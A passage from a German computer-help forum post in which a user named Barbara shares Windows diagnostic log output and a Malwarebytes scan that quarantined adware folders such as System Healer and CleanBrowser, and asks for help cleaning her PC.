Description: Programm HealerConsole.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: 1654
Startzeit: 01d2857673fc6d06
Beendigungszeit: 4294967295
Anwendungspfad: C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Berichts-ID: c93ef070-f169-11e6-b566-7824af3a6ca1
Vollständiger Name des fehlerhaften Pakets:
Auf das fehlerhafte Paket bezogene Anwendungs-ID:
Error: (02/12/2017 10:23:36 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Ein kritischer Systemprozess C:\WINDOWS\system32\lsass.exe ist fehlgeschlagen mit den Statuscode 1. Der Computer muss neu gestartet werden.
Error: (02/12/2017 10:17:05 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Die erweiterbare Leistungsindikator-DLL rdyboost kann nicht geladen werden. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Windows-Fehlercode.
Error: (02/12/2017 10:17:05 PM) (Source: Perflib) (EventID: 1017) (User: )
Description: Das Zusammenstellen der Leistungsindikatorendaten vom Dienst "ASP.NET_64_2.0.50727" wurde deaktiviert, da mindestens ein Fehler von der Leistungsindikatorenbibliothek für diesen Dienst verursacht wurde. Die Fehler, die diese Aktion erzwungen haben, wurden in das Ereignisprotokoll der Anwendung geschrieben. Die Fehler müssen behoben werden, bevor die Leistungsindikatoren für diesen Dienst aktiviert werden.
Error: (02/12/2017 10:17:05 PM) (Source: Perflib) (EventID: 1022) (User: )
Description: Windows kann die 64-Bit-Version der DLL für erweiterbare Leistungsindikatoren "ASP.NET_64_2.0.50727" in einer 32-Bit-Umgebung nicht öffnen. Wenden Sie sich an den Hersteller der Datei, um eine 64-Bit-Version zu erhalten. Sie können aber auch die 64-Bit-Version der DLL für erweiterbare Leistungsindikatoren öffnen, indem Sie die 64-Bit-Version der Leistungsüberwachung verwenden. Öffnen Sie den Ordner "Windows", öffnen Sie den Ordner "Syswow64", und starten Sie "Perfmon.exe", um dieses Programm zu verwenden.
Error: (02/12/2017 10:15:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: Barbara-PC)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{bf5e4a23-94b4-4781-90ac-7c988db7e8e6}“ wurde beendet, da das Anhalten zu lange dauerte.
Error: (02/12/2017 09:48:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LockAppHost.exe, Version: 10.0.14393.187, Zeitstempel: 0x57cf9d26
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.14393.479, Zeitstempel: 0x5825887f
Ausnahmecode: 0xc0000374
Fehleroffset: 0x00000000000f8283
ID des fehlerhaften Prozesses: 0x16c4
Startzeit der fehlerhaften Anwendung: 0x01d28498616b43a4
Pfad der fehlerhaften Anwendung: C:\Windows\System32\LockAppHost.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 5985970f-b9c0-4538-bd10-5dde95a4174c
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Systemfehler:
=============
Error: (02/13/2017 07:05:47 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (02/12/2017 10:27:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Internet Access Button" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/12/2017 10:27:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Hayzumflex" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/12/2017 10:24:54 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (02/12/2017 10:24:52 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.
Error: (02/12/2017 10:24:51 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am 12.02.2017 um 22:14:06 unerwartet heruntergefahren.
Error: (02/12/2017 10:22:42 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Origin Web Helper Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/12/2017 10:22:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Message Queuing" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (02/12/2017 10:22:15 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/12/2017 10:21:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Net.Msmq-Listeneradapter" wurde unerwartet beendet. Dies ist bereits 2 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 300000 Millisekunden durchgeführt: Neustart des Diensts.
CodeIntegrity:
===================================
Date: 2017-02-12 22:25:39.778
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-02-05 16:37:00.860
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-02-05 16:30:05.983
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-02-05 16:29:50.519
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-02-03 17:15:28.507
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-02-03 17:11:30.887
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-02-03 17:10:56.581
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-01-14 19:41:20.016
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-01-14 11:07:45.723
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
Date: 2017-01-13 17:19:17.372
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Prozentuale Nutzung des RAM: 11%
Installierter physikalischer RAM: 16328.44 MB
Verfügbarer physikalischer RAM: 14422.95 MB
Summe virtueller Speicher: 32712.44 MB
Verfügbarer virtueller Speicher: 30777.72 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:232.35 GB) (Free:163.48 GB) NTFS
Drive d: (Daten) (Fixed) (Total:1862.89 GB) (Free:1789.88 GB) NTFS
Drive e: (Disc2) (CDROM) (Total:7.88 GB) (Free:0 GB) UDF
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 6CF6904B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Ende von Addition.txt ============================
| Malwarebytes wollte keine Verbindung mit der Datenbank aufbauen, um diese zu aktualisieren. Habe trotzdem mal gescannt.
Hier das Log: Zitat: Malwarebytes Anti-Malware
www.malwarebytes.org
Suchlaufdatum: 13.02.2017
Suchlaufzeit: 19:09
Protokolldatei: mb.txt
Administrator: Ja
Version: 2.2.1.1043
Malware-Datenbank: v2016.02.16.06
Rootkit-Datenbank: v2016.02.08.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert
Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Barbara
Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 380788
Abgelaufene Zeit: 3 Min., 17 Sek.
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert
Prozesse: 0
(keine bösartigen Elemente erkannt)
Module: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)
Registrierungswerte: 0
(keine bösartigen Elemente erkannt)
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Ordner: 10
PUP.Optional.OneSystemCare, C:\Users\Barbara\AppData\Roaming\One System Care, In Quarantäne, [1d497de4a1f8bd79e844508d2fd3639d],
PUP.Optional.OneSystemCare, C:\Users\Barbara\AppData\Roaming\One System Care\Languages, In Quarantäne, [1d497de4a1f8bd79e844508d2fd3639d],
PUP.Optional.OneSystemCare, C:\Users\Barbara\AppData\Roaming\One System Care\WL, In Quarantäne, [1d497de4a1f8bd79e844508d2fd3639d],
PUP.Optional.SystemHealer, C:\Users\Barbara\AppData\Roaming\System Healer, In Quarantäne, [4422f071efaac1759033db121ee437c9],
PUP.Optional.SystemHealer, C:\Users\Barbara\AppData\Roaming\System Healer\Languages, In Quarantäne, [4422f071efaac1759033db121ee437c9],
PUP.Optional.SystemHealer, C:\Users\Barbara\AppData\Roaming\System Healer\WL, In Quarantäne, [4422f071efaac1759033db121ee437c9],
PUP.Optional.SystemHealer, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer, In Quarantäne, [d690a2bf8b0e93a3f9cbbe2f6b970cf4],
PUP.Optional.PCCleanPlus, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Clean Plus, In Quarantäne, [3432ea775049cc6a3bed25cc4ab8c63a],
PUP.Optional.CleanBrowser, C:\Program Files (x86)\CleanBrowser, In Quarantäne, [da8c29384554d75f13ad21d0bb475ca4],
PUP.Optional.CleanBrowser, C:\Program Files (x86)\CleanBrowser\app, In Quarantäne, [da8c29384554d75f13ad21d0bb475ca4],
Dateien: 0
(keine bösartigen Elemente erkannt)
Physische Sektoren: 0
(keine bösartigen Elemente erkannt)
(end)
|
Vielen Dank im Voraus für jede Hilfe...
Viele Grüße
Barbara
|
13.02.2017, 19:36
Baum-Darstellung